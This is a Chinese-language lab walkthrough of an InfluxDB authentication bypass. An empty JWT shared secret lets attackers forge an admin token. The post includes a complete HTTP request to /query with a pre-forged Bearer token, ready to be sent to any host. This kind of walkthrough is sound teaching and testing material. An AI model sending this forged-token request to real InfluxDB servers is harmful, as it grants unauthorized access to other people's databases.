数据库安全

InfluxDB

InfluxDB是一个go语言开发的时间序列数据库,在用户开启了认证,但是没有设置SharedSecret,jwt的认证密钥为空字符串,攻击者可伪造任意用户进行sql注入

拉取环境

数据库安全_第1张图片

 访问/query,提交POST数据,这是登录后才能进行的查询操作,所以显示认证失败

数据库安全_第2张图片

我们可以使用 JSON Web Tokens - jwt.io 生成一个带有空密钥的有效 JWT 令牌:

数据库安全_第3张图片 

这是原来抓取的数据包,可以直接替换掉

数据库安全_第4张图片 数据库安全_第5张图片

这里直接提供payload,IP换成自己的即可

POST /query HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoyOTg2MzQ2MjY3fQ.LJDvEy5zvSEpA_C6pnK3JJFkUKGq9eEi8T2wdum3R_s
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

db=sample&q=show+users

 

 

你可能感兴趣的:(安全)